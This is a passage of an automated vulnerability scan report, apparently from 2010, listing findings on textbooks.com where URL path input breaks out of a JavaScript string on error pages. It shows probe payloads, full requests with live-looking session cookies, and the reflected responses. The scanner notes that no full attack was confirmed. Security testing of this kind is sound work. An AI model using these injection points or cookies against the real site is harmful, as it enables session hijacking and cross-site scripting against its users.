Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/buy-textbooks.php7230b';ea4586f4bd2'

</script>
...[SNIP]...

1.51. http://www.textbooks.com/css/prod5.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/prod5.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a11'%3b9e00a943245 was submitted in the REST URL parameter 1. This input was echoed as 52a11';9e00a943245 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css52a11'%3b9e00a943245/prod5.css HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:54 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
SearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css52a11';9e00a943245/prod5.css'

</script>
...[SNIP]...

1.52. http://www.textbooks.com/css/prod5.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/prod5.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a2c6'%3beb439cb4840 was submitted in the REST URL parameter 2. This input was echoed as 4a2c6';eb439cb4840 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/prod5.css4a2c6'%3beb439cb4840 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:55 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css/prod5.css4a2c6';eb439cb4840'

</script>
...[SNIP]...

1.53. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c70'%3b5ad97567bac was submitted in the REST URL parameter 1. This input was echoed as a6c70';5ad97567bac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa6c70'%3b5ad97567bac/tb-v3.css HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:54 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
SearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/cssa6c70';5ad97567bac/tb-v3.css'

</script>
...[SNIP]...

1.54. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b060'%3b5f394d62013 was submitted in the REST URL parameter 2. This input was echoed as 7b060';5f394d62013 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/tb-v3.css7b060'%3b5f394d62013 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:55 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css/tb-v3.css7b060';5f394d62013'

</script>
...[SNIP]...

1.55. http://www.textbooks.com/custserv-intprop.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /custserv-intprop.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18ef'%3b2ddf58b8cc7 was submitted in the REST URL parameter 1. This input was echoed as e18ef';2ddf58b8cc7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /custserv-intprop.phpe18ef'%3b2ddf58b8cc7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:32 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/custserv-intprop.phpe18ef';2ddf58b8cc7'

</script>
...[SNIP]...

1.56. http://www.textbooks.com/custserv-whatisused.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /custserv-whatisused.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f856'%3bc87f43ffde1 was submitted in the REST URL parameter 1. This input was echoed as 2f856';c87f43ffde1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /custserv-whatisused.php2f856'%3bc87f43ffde1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
